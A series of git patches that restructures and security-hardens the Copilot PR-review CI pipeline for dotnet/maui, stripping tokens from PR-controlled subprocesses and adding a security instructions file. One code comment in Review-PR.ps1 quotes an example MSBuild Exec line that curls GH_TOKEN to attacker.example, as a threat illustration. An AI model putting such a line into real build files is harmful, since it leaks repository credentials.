@@ -734,13 +782,19 @@ stages: publishLocation: 'pipeline' condition: and(succeededOrFailed(), ne(variables['LogDirectory'], '')) - # Fail the pipeline if Copilot failed + # Fail the pipeline if any phase failed - bash: | + FAILED=0 if [ "$(CopilotFailed)" = "true" ]; then echo "##vso[task.logissue type=error]Copilot PR review failed. Check CopilotLogs artifact for details." - exit 1 + FAILED=1 + fi + if [ "$(GateFailed)" = "true" ]; then + echo "##vso[task.logissue type=warning]Gate phase failed — test verification did not pass." + FAILED=1 fi - displayName: 'Check Copilot Result' + exit $FAILED + displayName: 'Check Review Result' condition: succeededOrFailed() # ───────────────────────────────────────────────────────────────────────────── @@ -767,12 +821,12 @@ stages: - stage: RunDeepUITests displayName: 'Deep UI Tests (platform pool)' dependsOn: ReviewPR - condition: and(in(dependencies.ReviewPR.result, 'Succeeded', 'SucceededWithIssues', 'Failed'), ne(dependencies.ReviewPR.outputs['CopilotReview.RunReview.detectedCategories'], ''), ne(dependencies.ReviewPR.outputs['CopilotReview.RunReview.detectedCategories'], 'NONE')) + condition: and(in(dependencies.ReviewPR.result, 'Succeeded', 'SucceededWithIssues', 'Failed'), ne(dependencies.ReviewPR.outputs['CopilotReview.RunGate.detectedCategories'], ''), ne(dependencies.ReviewPR.outputs['CopilotReview.RunGate.detectedCategories'], 'NONE')) jobs: - job: RunUITests displayName: 'Run detected UI test categories' variables: - detectedCategories: $[ stageDependencies.ReviewPR.CopilotReview.outputs['RunReview.detectedCategories'] ] + detectedCategories: $[ stageDependencies.ReviewPR.CopilotReview.outputs['RunGate.detectedCategories'] ] # Use the SAME platform-pool selection logic as the CopilotReview # job — the deep-test agent should be the right OS for the # requested target platform. 
@@ -1245,7 +1299,7 @@ stages: dependsOn: - ReviewPR - RunDeepUITests - condition: and(in(dependencies.RunDeepUITests.result, 'Succeeded', 'SucceededWithIssues', 'Failed', 'Skipped'), or(ne(dependencies.ReviewPR.outputs['CopilotReview.RunReview.aiSummaryCommentId'], ''), in(dependencies.RunDeepUITests.result, 'Succeeded', 'SucceededWithIssues', 'Failed'))) + condition: and(in(dependencies.RunDeepUITests.result, 'Succeeded', 'SucceededWithIssues', 'Failed', 'Skipped'), or(ne(dependencies.ReviewPR.outputs['CopilotReview.RunPost.aiSummaryCommentId'], ''), in(dependencies.RunDeepUITests.result, 'Succeeded', 'SucceededWithIssues', 'Failed'))) jobs: - job: UpdateComment displayName: 'Post AI summary with review + deep test results' @@ -1254,7 +1308,7 @@ stages: # this just makes the value available as $(aiSummaryCommentId) # inside the steps. variables: - aiSummaryCommentId: $[ stageDependencies.ReviewPR.CopilotReview.outputs['RunReview.aiSummaryCommentId'] ] + aiSummaryCommentId: $[ stageDependencies.ReviewPR.CopilotReview.outputs['RunPost.aiSummaryCommentId'] ] pool: name: Azure Pipelines vmImage: ubuntu-22.04 From 29b15183aa9e0d9df699c3a2d31a810e97b9d291 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Fri, 22 May 2026 20:55:13 +0200 Subject: [PATCH 02/34] Fix review findings: persist regression data across phases - Persist regression risks, tests, and platform to files in Gate phase - Restore regression data + detect script path in CopilotReview phase - Fix stale RunReview references in comments (now RunGate/RunPost) - Fix misleading RunPost step name comment in ci-copilot.yml Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Review-PR.ps1 | 60 +++++++++++++++++++++++++++++++++-- eng/pipelines/ci-copilot.yml | 2 +- 2 files changed, 58 insertions(+), 4 deletions(-) diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 352934935b61..3cc3a1b43426 100644 --- 
a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -706,10 +706,10 @@ if (Test-Path $detectScript) { # Emit detected categories as an AzDO output variable so downstream # stages (RunDeepUITests, UpdateAISummaryComment) in ci-copilot.yml - # can read them via $(stageDependencies.ReviewPR.CopilotReview.outputs['RunReview.detectedCategories']). + # can read them via $(stageDependencies.ReviewPR.CopilotReview.outputs['RunGate.detectedCategories']). # `isOutput=true` is required for cross-stage consumption; the # variable name is namespaced under the step's `name:` property - # in ci-copilot.yml (currently `RunReview`) by AzDO. + # in ci-copilot.yml (currently `RunGate`) by AzDO. # Local invocations (no $env:TF_BUILD) won't have an AzDO variable # store but the marker is harmless — gets ignored. # Emit detected categories. Blank = "run all", a specific string = categories, @@ -1641,6 +1641,28 @@ $gateVerdictDir = if ($TrustedScriptsDir) { $gateResult | Set-Content (Join-Path $gateVerdictDir "gate-result.txt") -Encoding UTF8 Write-Host " 📄 Gate result persisted: $gateResult" -ForegroundColor Gray +# Persist regression data for CopilotReview phase (try-fix instructions) +if ($risksData) { + try { + $risksData | ConvertTo-Json -Depth 10 -Compress | Set-Content (Join-Path $gateVerdictDir "regression-risks.json") -Encoding UTF8 + if ($regressionTests -and $regressionTests.Count -gt 0) { + @($regressionTests) | ConvertTo-Json -Depth 5 -Compress | Set-Content (Join-Path $gateVerdictDir "regression-tests.json") -Encoding UTF8 + } + if ($regrPlatform) { + $regrPlatform | Set-Content (Join-Path $gateVerdictDir "regression-platform.txt") -Encoding UTF8 + } + Write-Host " 📄 Regression data persisted" -ForegroundColor Gray + } catch { + Write-Host " ⚠️ Failed to persist regression data (non-fatal): $_" -ForegroundColor Yellow + } +} + +# Persist detect script path and detected categories for Tier 3 refresh +if ($detectScript) { + $detectScript | Set-Content 
(Join-Path $gateVerdictDir "detect-script-path.txt") -Encoding UTF8 +} +$uitestCategories | Set-Content (Join-Path $gateVerdictDir "uitest-categories.txt") -Encoding UTF8 + } # end if (-not $skipGateAndTryFix) } # end if ($runGate) @@ -1650,7 +1672,8 @@ if ($runCopilotReview) { # Restore gate result from file when running in phased mode if ($Phase -eq 'CopilotReview') { - $gateVerdictFile = Join-Path (Split-Path $TrustedScriptsDir -Parent) "gate-result.txt" + $gateVerdictDir = Split-Path $TrustedScriptsDir -Parent + $gateVerdictFile = Join-Path $gateVerdictDir "gate-result.txt" if (Test-Path $gateVerdictFile) { $gateResult = (Get-Content $gateVerdictFile -Raw).Trim() Write-Host " 📄 Restored gate result: $gateResult" -ForegroundColor Gray @@ -1658,6 +1681,37 @@ if ($Phase -eq 'CopilotReview') { $gateResult = "SKIPPED" Write-Host " ⚠️ Gate result file not found — defaulting to SKIPPED" -ForegroundColor Yellow } + + # Restore regression data persisted by Gate phase + $risksFile = Join-Path $gateVerdictDir "regression-risks.json" + $testsFile = Join-Path $gateVerdictDir "regression-tests.json" + $platFile = Join-Path $gateVerdictDir "regression-platform.txt" + if (Test-Path $risksFile) { + try { + $risksData = Get-Content $risksFile -Raw -Encoding UTF8 | ConvertFrom-Json + if (Test-Path $testsFile) { + $regressionTests = @(Get-Content $testsFile -Raw -Encoding UTF8 | ConvertFrom-Json) + } + if (Test-Path $platFile) { + $regrPlatform = (Get-Content $platFile -Raw).Trim() + } else { + $regrPlatform = if ($Platform) { $Platform } else { "android" } + } + Write-Host " 📄 Restored regression data ($($regressionTests.Count) tests)" -ForegroundColor Gray + } catch { + Write-Host " ⚠️ Failed to restore regression data (non-fatal): $_" -ForegroundColor Yellow + } + } + + # Restore detect script path and UI test categories for Tier 3 refresh + $detectPathFile = Join-Path $gateVerdictDir "detect-script-path.txt" + $catsFile = Join-Path $gateVerdictDir "uitest-categories.txt" + if 
(Test-Path $detectPathFile) { + $detectScript = (Get-Content $detectPathFile -Raw).Trim() + } + if (Test-Path $catsFile) { + $uitestCategories = (Get-Content $catsFile -Raw).Trim() + } } # Restore review branch diff --git a/eng/pipelines/ci-copilot.yml b/eng/pipelines/ci-copilot.yml index 890fe6d59942..ef4642279c66 100644 --- a/eng/pipelines/ci-copilot.yml +++ b/eng/pipelines/ci-copilot.yml @@ -726,7 +726,7 @@ stages: fi echo "Review output saved to $(Build.ArtifactStagingDirectory)/copilot-logs/" - name: RunPost # referenceable name so the new RunDeepUITests / UpdateAISummaryComment stages can read this step's output variables (detectedCategories, detectedPlatform) via $(stageDependencies.ReviewPR.CopilotReview.outputs['RunPost.']) + name: RunPost # Stage 3 (UpdateAISummaryComment) reads aiSummaryCommentId via $(stageDependencies.ReviewPR.CopilotReview.outputs['RunPost.aiSummaryCommentId']). Note: detectedCategories comes from RunGate, not RunPost. displayName: 'Task 4: Post (comments + labels)' env: GH_TOKEN: $(GH_COMMENT_TOKEN) From 647786a8cd605b96fdb5135d43e01717e43deef3 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Fri, 22 May 2026 20:57:21 +0200 Subject: [PATCH 03/34] Fix detectedCategories routing: coalesce RunReview with RunGate The Tier 3 AI refresh in CopilotReview phase emits detectedCategories under step RunReview, but downstream RunDeepUITests was only reading RunGate. Use coalesce() so AI-refreshed categories are preferred when available, falling back to Gate-detected categories otherwise. 
Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- eng/pipelines/ci-copilot.yml | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/eng/pipelines/ci-copilot.yml b/eng/pipelines/ci-copilot.yml index ef4642279c66..95232f9994f0 100644 --- a/eng/pipelines/ci-copilot.yml +++ b/eng/pipelines/ci-copilot.yml @@ -821,12 +821,20 @@ stages: - stage: RunDeepUITests displayName: 'Deep UI Tests (platform pool)' dependsOn: ReviewPR - condition: and(in(dependencies.ReviewPR.result, 'Succeeded', 'SucceededWithIssues', 'Failed'), ne(dependencies.ReviewPR.outputs['CopilotReview.RunGate.detectedCategories'], ''), ne(dependencies.ReviewPR.outputs['CopilotReview.RunGate.detectedCategories'], 'NONE')) + # Prefer AI-refreshed categories from CopilotReview (RunReview) when available, + # falling back to Gate-detected categories (RunGate). RunReview is only set when + # the Tier 3 AI refresh actually changed the categories; otherwise it's empty. + condition: >- + and( + in(dependencies.ReviewPR.result, 'Succeeded', 'SucceededWithIssues', 'Failed'), + ne(coalesce(dependencies.ReviewPR.outputs['CopilotReview.RunReview.detectedCategories'], dependencies.ReviewPR.outputs['CopilotReview.RunGate.detectedCategories']), ''), + ne(coalesce(dependencies.ReviewPR.outputs['CopilotReview.RunReview.detectedCategories'], dependencies.ReviewPR.outputs['CopilotReview.RunGate.detectedCategories']), 'NONE') + ) jobs: - job: RunUITests displayName: 'Run detected UI test categories' variables: - detectedCategories: $[ stageDependencies.ReviewPR.CopilotReview.outputs['RunGate.detectedCategories'] ] + detectedCategories: $[ coalesce(stageDependencies.ReviewPR.CopilotReview.outputs['RunReview.detectedCategories'], stageDependencies.ReviewPR.CopilotReview.outputs['RunGate.detectedCategories']) ] # Use the SAME platform-pool selection logic as the CopilotReview # job — the deep-test agent should be the right OS for the # requested target platform. 
From 3fd884a72d3adcfb98dde57e1488b2f8fd6c5fd4 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Fri, 22 May 2026 21:03:21 +0200 Subject: [PATCH 04/34] Fix null crash in Post/CopilotReview phases + add sentinel check - Add TrustedScriptsDir null guard with local fallback in both CopilotReview and Post phase restoration blocks (prevents ParameterBindingException when running locally with -Phase) - Add setup-complete sentinel verification before Gate/CopilotReview/Post phases to fail fast with clear error if Setup didn't complete Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Review-PR.ps1 | 27 +++++++++++++++++++++++++-- 1 file changed, 25 insertions(+), 2 deletions(-) diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 3cc3a1b43426..5cee7c5a901a 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -330,6 +330,20 @@ if ($Phase -eq 'Setup') { exit 0 } +# ─── Sentinel check: verify Setup completed before running later phases ─── +if ($Phase -and $Phase -ne 'Setup') { + $sentinelDir = if ($TrustedScriptsDir) { + Split-Path $TrustedScriptsDir -Parent + } else { + Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/gate" + } + $sentinelFile = Join-Path $sentinelDir "setup-complete" + if (-not (Test-Path $sentinelFile)) { + Write-Error "Setup phase did not complete (sentinel not found at '$sentinelFile'). Cannot proceed with -Phase $Phase." + exit 1 + } +} + # ─── Helper: Parse `dotnet test --logger "console;verbosity=detailed"` ────── # Extracts per-test results (Passed/Failed/Skipped) plus failure messages and # stack traces from raw stdout. 
Used by STEP 3 so the AI summary comment shows @@ -1672,7 +1686,11 @@ if ($runCopilotReview) { # Restore gate result from file when running in phased mode if ($Phase -eq 'CopilotReview') { - $gateVerdictDir = Split-Path $TrustedScriptsDir -Parent + $gateVerdictDir = if ($TrustedScriptsDir) { + Split-Path $TrustedScriptsDir -Parent + } else { + Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/gate" + } $gateVerdictFile = Join-Path $gateVerdictDir "gate-result.txt" if (Test-Path $gateVerdictFile) { $gateResult = (Get-Content $gateVerdictFile -Raw).Trim() @@ -1971,7 +1989,12 @@ if ($runPost) { # Restore gate result from file when running in phased mode if ($Phase -eq 'Post') { - $gateVerdictFile = Join-Path (Split-Path $TrustedScriptsDir -Parent) "gate-result.txt" + $gateVerdictDir = if ($TrustedScriptsDir) { + Split-Path $TrustedScriptsDir -Parent + } else { + Join-Path $RepoRoot "CustomAgentLogsTmp/PRState/$PRNumber/PRAgent/gate" + } + $gateVerdictFile = Join-Path $gateVerdictDir "gate-result.txt" if (Test-Path $gateVerdictFile) { $gateResult = (Get-Content $gateVerdictFile -Raw).Trim() } else { From 485e8657c7c7340bc00f2d55748006fbadf2596d Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Fri, 22 May 2026 22:50:01 +0200 Subject: [PATCH 05/34] Add GH_TOKEN to Gate phase for PR metadata fetches MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The detection script (Detect-TestsInDiff.ps1) fetches PR metadata and labels from the GitHub API. Without GH_TOKEN, these calls are unauthenticated and subject to low rate limits. This adds the token for reliable API access. The token is GH_COMMENT_TOKEN (same as Setup/Post phases). The security boundary is preserved — only CopilotReview (Task 3) lacks GH_TOKEN to prevent the Copilot agent from posting directly. 
Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Review-PR.ps1 | 2 +- eng/pipelines/ci-copilot.yml | 5 ++++- 2 files changed, 5 insertions(+), 2 deletions(-) diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 5cee7c5a901a..48b621343f6e 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -93,7 +93,7 @@ if (-not $RepoRoot) { Write-Error "Not in a git repository"; exit 1 } # exactly the secrets it needs in its env: block. # # Task 1 (Setup): env: GH_TOKEN. No dotnet, no copilot. -# Task 2 (Gate): env: . dotnet build/test only. +# Task 2 (Gate): env: GH_TOKEN (read-only). dotnet build/test + PR metadata. # Task 3 (CopilotReview): env: COPILOT_GITHUB_TOKEN. copilot → dotnet (stripped). # Task 4 (Post): env: GH_TOKEN. Trusted scripts, no dotnet. # diff --git a/eng/pipelines/ci-copilot.yml b/eng/pipelines/ci-copilot.yml index 95232f9994f0..56ec29e6e38a 100644 --- a/eng/pipelines/ci-copilot.yml +++ b/eng/pipelines/ci-copilot.yml @@ -644,7 +644,9 @@ stages: # ───────────────────────────────────────────────────────── # Task 2 — GATE: UI detection, test runs, regression, - # gate verification. NO tokens — only dotnet/build tools. + # gate verification. GH_TOKEN is read-only here — needed + # by Detect-TestsInDiff.ps1 for PR metadata/label fetches. + # No COPILOT_GITHUB_TOKEN — the agent can't run here. 
# ───────────────────────────────────────────────────────── - bash: | echo "═══ TASK 2: GATE ═══" @@ -667,6 +669,7 @@ stages: name: RunGate displayName: 'Task 2: Gate (test verification)' env: + GH_TOKEN: $(GH_COMMENT_TOKEN) PARAM_PR_NUMBER: ${{ parameters.PRNumber }} # ───────────────────────────────────────────────────────── From a22749df1e81334c32d42b72b68e516dd15e9dd7 Mon Sep 17 00:00:00 2001 From: Tomas Grosup Date: Tue, 26 May 2026 10:41:21 +0200 Subject: [PATCH 06/34] [CI] Plug GH service-connection token leaks in copilot pipeline MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Three small hardening changes uncovered while auditing PR #35324: 1. RunDeepUITests checkout: add persistCredentials: false. This stage merges the PR head and runs PR-modified scripts (BuildAndRunHostApp.ps1, Invoke-UITestWithRetry.ps1) — without this, malicious PR code could read the GitHub App auth header from .git/config. 2. UpdateAISummaryComment checkout: add persistCredentials: false. Defense-in-depth — this stage runs with GH_COMMENT_TOKEN in env. 3. Setup task: chmod -R a-w on the trusted-github dir after copy, so the Copilot agent in Task 3 cannot tamper with the scripts that Task 4 will execute with GH_TOKEN. 
Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- eng/pipelines/ci-copilot.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/eng/pipelines/ci-copilot.yml b/eng/pipelines/ci-copilot.yml index 56ec29e6e38a..93e621e822bf 100644 --- a/eng/pipelines/ci-copilot.yml +++ b/eng/pipelines/ci-copilot.yml @@ -619,6 +619,7 @@ stages: mkdir -p "$TRUSTED" cp -r .github/scripts "$TRUSTED/scripts" cp -r .github/skills "$TRUSTED/skills" + chmod -R a-w "$TRUSTED" echo "Trusted scripts copied to $TRUSTED" # Run Setup phase (branch checkout + PR merge) @@ -855,6 +856,7 @@ stages: steps: - checkout: self fetchDepth: 0 + persistCredentials: false # Bring in .NET + workloads + tasks DLL — same prerequisites the # CopilotReview job used. Reusing the install-dotnet template @@ -1326,6 +1328,7 @@ stages: timeoutInMinutes: 30 steps: - checkout: self + persistCredentials: false - task: DownloadPipelineArtifact@2 displayName: 'Download CopilotLogs' From ca5ce6d848729605df49af2c91789d5902686d28 Mon Sep 17 00:00:00 2001 From: Tomas Grosup Date: Tue, 26 May 2026 10:53:28 +0200 Subject: [PATCH 07/34] [CI] Strip GH_TOKEN from PR-code subprocesses; trust eng/scripts copy Addresses two [critical] security findings from MauiBot's 2026-05-24 review of PR #35324 (https://github.com/dotnet/maui/pull/35324): 1. eng/scripts/detect-ui-test-categories.ps1 was being invoked from the PR-merged worktree ($RepoRoot/eng/scripts/...) during the Gate task, which has GH_TOKEN=$(GH_COMMENT_TOKEN) in env. A PR could replace that one file to exfiltrate the maui-bot posting token. Fix: copy eng/scripts into the trusted directory alongside .github/scripts and .github/skills, add $EngScriptsDir resolution in Review-PR.ps1, and route the two $detectScript invocations through it. Same root cause also applied to $uiTestRunner / $deviceTestRunner (now use $ScriptsDir and $SkillsDir instead of $RepoRoot/.github/...). 2. 
dotnet test, BuildAndRunHostApp.ps1, Run-DeviceTests.ps1, and verify-tests-fail.ps1 all execute PR-controlled code (MSBuild targets, source generators, analyzers, test code, host-app builds). Any of these could read $env:GH_TOKEN via an <Exec> task in a .csproj or Directory.Build.targets and POST it. Fix: introduce Invoke-WithoutGhTokens helper that clears GH_TOKEN / GITHUB_TOKEN / COPILOT_GITHUB_TOKEN for the duration of a scriptblock, then restores them. Wrap every Gate-phase invocation of PR-controlled code. Trusted metadata-fetch scripts (Detect-TestsInDiff, Find-RegressionRisks, detect-ui-test-categories) still see GH_TOKEN -- they need it for `gh` CLI. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Review-PR.ps1 | 50 +++++++++++++++++++++++++++-------- eng/pipelines/ci-copilot.yml | 1 + 2 files changed, 40 insertions(+), 11 deletions(-) diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 48b621343f6e..607c06079198 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -93,7 +93,9 @@ if (-not $RepoRoot) { Write-Error "Not in a git repository"; exit 1 } # exactly the secrets it needs in its env: block. # # Task 1 (Setup): env: GH_TOKEN. No dotnet, no copilot. -# Task 2 (Gate): env: GH_TOKEN (read-only). dotnet build/test + PR metadata. +# Task 2 (Gate): env: GH_TOKEN. PR-code subprocesses (dotnet test, +# BuildAndRunHostApp.ps1, etc.) are wrapped via +# Invoke-WithoutGhTokens so they cannot exfiltrate the token. # Task 3 (CopilotReview): env: COPILOT_GITHUB_TOKEN. copilot → dotnet (stripped). # Task 4 (Post): env: GH_TOKEN. Trusted scripts, no dotnet. # @@ -106,8 +108,33 @@ $runPost = -not $Phase -or $Phase -eq 'Post' # Resolve the scripts directory — use TrustedScriptsDir if provided (CI), # otherwise use the repo's own .github/ directory (local dev).
-$ScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'scripts' } else { $PSScriptRoot } -$SkillsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'skills' } else { Join-Path $PSScriptRoot '../skills' } +$ScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'scripts' } else { $PSScriptRoot } +$SkillsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'skills' } else { Join-Path $PSScriptRoot '../skills' } +$EngScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'eng-scripts' } else { Join-Path $PSScriptRoot '../../eng/scripts' } + +# Gate has GH_TOKEN in env so trusted code (Detect-TestsInDiff, Find-RegressionRisks, +# detect-ui-test-categories) can fetch PR metadata via `gh` CLI. Any subprocess that +# executes PR-controlled code (MSBuild targets, test code, source generators, host-app +# builds) would otherwise inherit that token and trivially exfiltrate it via something +# like `<Exec Command="curl -d $(GH_TOKEN) https://attacker.example" />` in a .csproj or +# Directory.Build.targets. Wrap every such invocation in Invoke-WithoutGhTokens.
+function Invoke-WithoutGhTokens { + [CmdletBinding()] + param([Parameter(Mandatory)][scriptblock]$ScriptBlock) + $saved = @{ + GH_TOKEN = $env:GH_TOKEN + GITHUB_TOKEN = $env:GITHUB_TOKEN + COPILOT_GITHUB_TOKEN = $env:COPILOT_GITHUB_TOKEN + } + try { + $env:GH_TOKEN = $null + $env:GITHUB_TOKEN = $null + $env:COPILOT_GITHUB_TOKEN = $null + & $ScriptBlock + } finally { + foreach ($k in $saved.Keys) { Set-Item -Path ("env:" + $k) -Value $saved[$k] } + } +} # ─── Banner ─────────────────────────────────────────────────────────────────── Write-Host "" @@ -693,7 +720,7 @@ Write-Host "╚═════════════════════ $uitestCategories = "" -$detectScript = Join-Path $RepoRoot "eng/scripts/detect-ui-test-categories.ps1" +$detectScript = Join-Path $EngScriptsDir "detect-ui-test-categories.ps1" if (Test-Path $detectScript) { try { $detectOutput = & pwsh -NoProfile -File $detectScript -PrNumber "$PRNumber" 2>&1 @@ -822,11 +849,12 @@ if ($uitestCategories -eq 'NONE') { $testExitCode = -1 $envErrHit = $null try { - $runResult = & $sharedRunner ` + $runResult = Invoke-WithoutGhTokens { & $sharedRunner ` -Platform $uitestPlatform ` -Category $cat ` -RepoRoot $RepoRoot ` -LogFile $catLogPath + } if ($runResult) { $testOutput = $runResult.Output $testExitCode = $runResult.ExitCode @@ -1282,8 +1310,8 @@ if ($risksData -and ($risksData.result -eq 'REVERT' -or $risksData.result -eq 'O $regrTestDetails = @() $regrPlatform = if ($Platform) { $Platform } else { "android" } - $uiTestRunner = Join-Path $RepoRoot ".github/scripts/BuildAndRunHostApp.ps1" - $deviceTestRunner = Join-Path $RepoRoot ".github/skills/run-device-tests/scripts/Run-DeviceTests.ps1" + $uiTestRunner = Join-Path $ScriptsDir "BuildAndRunHostApp.ps1" + $deviceTestRunner = Join-Path $SkillsDir "run-device-tests/scripts/Run-DeviceTests.ps1" foreach ($t in $regressionTests) { Write-Host "" @@ -1294,7 +1322,7 @@ if ($risksData -and ($risksData.result -eq 'REVERT' -or $risksData.result -eq 'O 'UITest' { if (Test-Path $uiTestRunner) { 
Write-Host " 🖥️ Running UI test via BuildAndRunHostApp.ps1 -Platform $regrPlatform -TestFilter `"$($t.Filter)`"" -ForegroundColor Cyan - $testOutput = & $uiTestRunner -Platform $regrPlatform -TestFilter $t.Filter 2>&1 + $testOutput = Invoke-WithoutGhTokens { & $uiTestRunner -Platform $regrPlatform -TestFilter $t.Filter 2>&1 } $testExitCode = $LASTEXITCODE $testOutput | Select-Object -Last 20 | ForEach-Object { Write-Host " $_" } } else { @@ -1306,7 +1334,7 @@ if ($risksData -and ($risksData.result -eq 'REVERT' -or $risksData.result -eq 'O if (Test-Path $deviceTestRunner) { $dtProject = if ($t.Project) { $t.Project } else { 'Controls' } Write-Host " 📱 Running device test via Run-DeviceTests.ps1 -Project $dtProject -Platform $regrPlatform -TestFilter `"$($t.Filter)`"" -ForegroundColor Cyan - $testOutput = & $deviceTestRunner -Project $dtProject -Platform $regrPlatform -TestFilter $t.Filter 2>&1 + $testOutput = Invoke-WithoutGhTokens { & $deviceTestRunner -Project $dtProject -Platform $regrPlatform -TestFilter $t.Filter 2>&1 } $testExitCode = $LASTEXITCODE $testOutput | Select-Object -Last 20 | ForEach-Object { Write-Host " $_" } } else { @@ -1318,7 +1346,7 @@ if ($risksData -and ($risksData.result -eq 'REVERT' -or $risksData.result -eq 'O if ($t.ProjectPath) { $resolvedProj = Join-Path $RepoRoot $t.ProjectPath Write-Host " 🧪 Running: dotnet test $($t.ProjectPath) --filter `"$($t.Filter)`"" -ForegroundColor Cyan - $testOutput = dotnet test $resolvedProj --filter $t.Filter --logger "console;verbosity=minimal" 2>&1 + $testOutput = Invoke-WithoutGhTokens { dotnet test $resolvedProj --filter $t.Filter --logger "console;verbosity=minimal" 2>&1 } $testExitCode = $LASTEXITCODE $testOutput | Select-Object -Last 20 | ForEach-Object { Write-Host " $_" } } else { @@ -1459,7 +1487,7 @@ for ($gateAttempt = 1; $gateAttempt -le $maxGateAttempts; $gateAttempt++) { # PR like a regression repro), it falls back to "verify failure only" mode # and reports whether the new tests fail 
without any fix. Passing the flag # would force the script to error out for those PRs. - $gateOutput = & pwsh -NoProfile -File "$verifyScript" -Platform $gatePlatform -PRNumber $PRNumber 2>&1 + $gateOutput = Invoke-WithoutGhTokens { & pwsh -NoProfile -File "$verifyScript" -Platform $gatePlatform -PRNumber $PRNumber 2>&1 } $gateExitCode = $LASTEXITCODE $gateOutput | ForEach-Object { Write-Host " $_" } diff --git a/eng/pipelines/ci-copilot.yml b/eng/pipelines/ci-copilot.yml index 93e621e822bf..91240747f5a2 100644 --- a/eng/pipelines/ci-copilot.yml +++ b/eng/pipelines/ci-copilot.yml @@ -619,6 +619,7 @@ stages: mkdir -p "$TRUSTED" cp -r .github/scripts "$TRUSTED/scripts" cp -r .github/skills "$TRUSTED/skills" + cp -r eng/scripts "$TRUSTED/eng-scripts" chmod -R a-w "$TRUSTED" echo "Trusted scripts copied to $TRUSTED" From 0d1acf3f5681219cbdd4494b13ec39d4246fbb26 Mon Sep 17 00:00:00 2001 From: Tomas Grosup Date: Tue, 26 May 2026 11:15:56 +0200 Subject: [PATCH 08/34] [CI] Add security instructions for ci-copilot pipeline surface Distills the threat model + 8 prevention rules from PR #35324 (and the MauiBot findings + T-Gro audit that surfaced them) into a single .github/instructions file that auto-applies whenever anyone edits any script/yaml/markdown belonging to the Copilot PR-review pipeline. Rules covered: 1. Per-task token scoping (AzDO env: block) 2. persistCredentials: false on every checkout: self 3. Trusted-script copy + chmod -R a-w before PR merge 4. Strip GH_TOKEN/GITHUB_TOKEN/COPILOT_GITHUB_TOKEN from env before invoking PR-controlled code (dotnet test, MSBuild, host-app, etc.) 5. Cross-phase signal files in Agent.TempDirectory, never working tree 6. Strip ##vso[...] from PR-controlled stdout (with CR handling) 7. gh-aw version pinning, .lock.yml regeneration, trusted .github/ restore on workflow_dispatch 8. 
No tokens via pipeline variables / log lines Includes a code-review checklist and grep anti-pattern scans so future contributors (human or agent) editing any of ~25 files in this surface get the security context automatically via VS Code Copilot applyTo. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- ...-copilot-pipeline-security.instructions.md | 242 ++++++++++++++++++ 1 file changed, 242 insertions(+) create mode 100644 .github/instructions/ci-copilot-pipeline-security.instructions.md diff --git a/.github/instructions/ci-copilot-pipeline-security.instructions.md b/.github/instructions/ci-copilot-pipeline-security.instructions.md new file mode 100644 index 000000000000..c4bcfaa82252 --- /dev/null +++ b/.github/instructions/ci-copilot-pipeline-security.instructions.md @@ -0,0 +1,242 @@ +--- +description: "Security rules for the Copilot PR-review pipeline: token scoping, trusted-script copy, PR-controlled code isolation, AzDO/git credential handling." +applyTo: "eng/pipelines/ci-copilot.yml, .github/scripts/Review-PR.ps1, .github/scripts/Review-PR.Tests.ps1, .github/scripts/BuildAndRunHostApp.ps1, .github/scripts/BuildAndRunSandbox.ps1, .github/scripts/Find-RegressionRisks.ps1, .github/scripts/Post-CodeReview.ps1, .github/scripts/post-inline-review.ps1, .github/scripts/post-ai-summary-comment.ps1, .github/scripts/post-pr-finalize-comment.ps1, .github/scripts/shared/**, .github/skills/pr-review/**, .github/skills/verify-tests-fail-without-fix/**, .github/skills/try-fix/**, .github/skills/run-device-tests/scripts/**, .github/pr-review/**, .github/workflows/review-trigger.yml, .github/workflows/pr-review-queue.yml, .github/workflows/copilot-evaluate-tests.md, .github/workflows/copilot-evaluate-tests.lock.yml, eng/scripts/detect-ui-test-categories.ps1" +--- + +# CI Copilot Pipeline — Security Rules + +This pipeline runs **untrusted PR code** (anything contributed in `dotnet/maui` PRs, including PRs from forks) on AzDO hosted agents **with 
